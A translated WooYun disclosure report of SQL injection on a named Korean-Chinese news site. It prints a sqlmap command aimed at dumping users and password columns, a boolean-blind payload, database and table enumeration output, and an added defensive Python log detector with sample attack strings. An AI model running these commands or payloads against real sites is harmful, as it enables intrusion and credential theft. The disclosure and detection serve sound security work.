Vulnerability summary

Defect ID: wooyun-2015-0155638

Title: SQL injection on the main site of Korea Economic bnt News (韩国经济bnt新闻网) (110,000 photo records exposed + large number of user passwords exposed)

Vendor: Korea Economic bnt News (韩国经济bnt新闻网)

Author: 路人甲

Submitted: 2015-11-25 14:06

Fix time: 2016-01-11 15:32

Disclosed: 2016-01-11 15:32

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-25: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-01-11: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Comprehensive online news covering fashion, beauty, entertainment and culture
News and information
ON/OFF LINE comprehensive advertising
Cultural and arts event planning

Detailed description:

URL: http://www.bntnews.cn/app/news.php?nid=31229

$ python sqlmap.py -u "http://www.bntnews.cn/app/news.php?nid=31229" -p nid --technique=B --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: BNTNewsChina
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| TRN_SLIDE_IMAGE | 118300 |
Database: BNTNewsChina
Table: TRN_SLIDE_IMAGE
[6 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| CAPTION | varchar(200) |
| DELETE_FLG | char(1) |
| ENTRY_DT | timestamp |
| PROVIDER | varchar(200) |
| SLIDE_ID | int(11) |
| SLIDE_IMAGE_ID | int(11) |
+----------------+--------------+


Proof of vulnerability:

---
Parameter: nid (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: nid=(SELECT (CASE WHEN (5491=5491) THEN 5491 ELSE 5491*(SELECT 5491 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user: 'BNTNewsADMIN@localhost'
current user is DBA: False
database management system users [1]:
[*] 'BNTNewsADMIN'@'localhost'
Database: BNTEconomicCN
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| TRN_NEWS | 1648 |
| TRN_WRITER | 7 |
| TRN_BANNER | 6 |
| MST_MAIN_MENU | 4 |
+---------------------------------------+---------+
Database: BNTNewsChina
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| TRN_SLIDE_IMAGE | 118300 |
| TRN_NEWS | 32843 |
| TRN_PARTNER_NEWS | 23018 |
| TRN_NEWS_IMAGE | 1102 |
| TRN_BANNER | 185 |
| TRN_WRITER | 32 |
| MST_SUB_MENU_1ST | 16 |
| TRN_BOX_BANNER_IMAGE | 6 |
| MST_MAIN_MENU | 5 |
| TRN_PARTNER | 4 |
| TRN_BOX_BANNER | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 495 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 277 |
| SESSION_VARIABLES | 277 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| PARTITIONS | 44 |
| TABLES | 44 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 36 |
| STATISTICS | 28 |
| KEY_COLUMN_USAGE | 20 |
| TABLE_CONSTRAINTS | 19 |
| PROCESSLIST | 14 |
| PLUGINS | 7 |
| ENGINES | 5 |
| SCHEMATA | 3 |
| REFERENTIAL_CONSTRAINTS | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: BNTEconomicCN
Table: TRN_WRITER
[1 column]
+----------+
| Column |
+----------+
| PASSWORD |
+----------+
Database: BNTNewsChina
Table: TRN_WRITER
[1 column]
+----------+
| Column |
+----------+
| PASSWORD |
+----------+
Database: BNTEconomicCN
Table: TRN_WRITER
[7 entries]
Database: BNTNewsChina
Table: TRN_WRITER
[32 entries]
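The finding above is a boolean-based blind injection through the integer parameter nid, and the sqlmap run used --random-agent, so detection that keys on the User-Agent would miss it. The following is an added example (not part of the report or of bntnews.cn's code) that scans constructed Apache combined-format log lines and flags every news.php request whose nid is not the plain integer the application expects; the IPs, timestamps and log lines are constructed, and the URL-decoded payload in sample line 2 is the one quoted in the proof section.

```python
# Added example, not part of the WooYun report or bntnews.cn's code: a detector that
# replays the shape of this finding over constructed Apache combined-format log
# lines and flags news.php requests whose nid value is not the plain integer the
# application expects. It keys on the parameter, not the User-Agent, because the
# report ran sqlmap with --random-agent (sample line 2 carries a normal browser UA).
import re
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Fragments seen in sqlmap's MySQL boolean-based blind payloads and common hand probes.
SQL_HINTS = ("SELECT", "CASE WHEN", "INFORMATION_SCHEMA", " AND ", " OR ", "SLEEP(")

# Constructed sample: clean hit, the report's payload (%20 = space, %3D = '='),
# a quote probe, an unrelated page, and a tautology probe.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Nov/2015:14:05:58 +0800] "GET /app/news.php?nid=31229 HTTP/1.1" 200 18342 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Nov/2015:14:06:01 +0800] "GET /app/news.php?nid=(SELECT%20(CASE%20WHEN%20(5491%3D5491)%20THEN%205491%20ELSE%205491*(SELECT%205491%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END)) HTTP/1.1" 200 18342 "-" "Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0"',
    '198.51.100.9 - - [25/Nov/2015:14:07:12 +0800] "GET /app/news.php?nid=31229%27 HTTP/1.1" 500 612 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [25/Nov/2015:14:07:13 +0800] "GET /app/index.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [25/Nov/2015:14:07:20 +0800] "GET /app/news.php?nid=31229%20AND%201%3D1 HTTP/1.1" 200 18342 "-" "Mozilla/5.0"',
]

def classify_nid(value):
    """Classify one URL-decoded nid value: ('ok' | 'sqli' | 'malformed', reason)."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return "ok", "integer"
    hits = [h.strip() for h in SQL_HINTS if h in value.upper()]
    if hits:
        return "sqli", "contains " + ", ".join(hits)
    return "malformed", "non-integer nid"

def scan_log(lines):
    """Return (ip, nid, verdict, reason) for each news.php request whose nid is not clean."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/app/news.php"):
            continue
        # parse_qs URL-decodes and splits each pair on its first '=' only
        for nid in parse_qs(url.query, keep_blank_values=True).get("nid", []):
            verdict, reason = classify_nid(nid)
            if verdict != "ok":
                findings.append((m.group("ip"), nid, verdict, reason))
    return findings
```

Calling scan_log(SAMPLE_LOG) returns three findings: the report's payload and the tautology probe as "sqli", and the quote probe as "malformed"; the same whitelist check in classify_nid is what the application itself should apply to nid before it reaches the query.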

Fix recommendation:

Add filtering.

Copyright notice: please credit the source when reposting: 路人甲@WooYun


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined.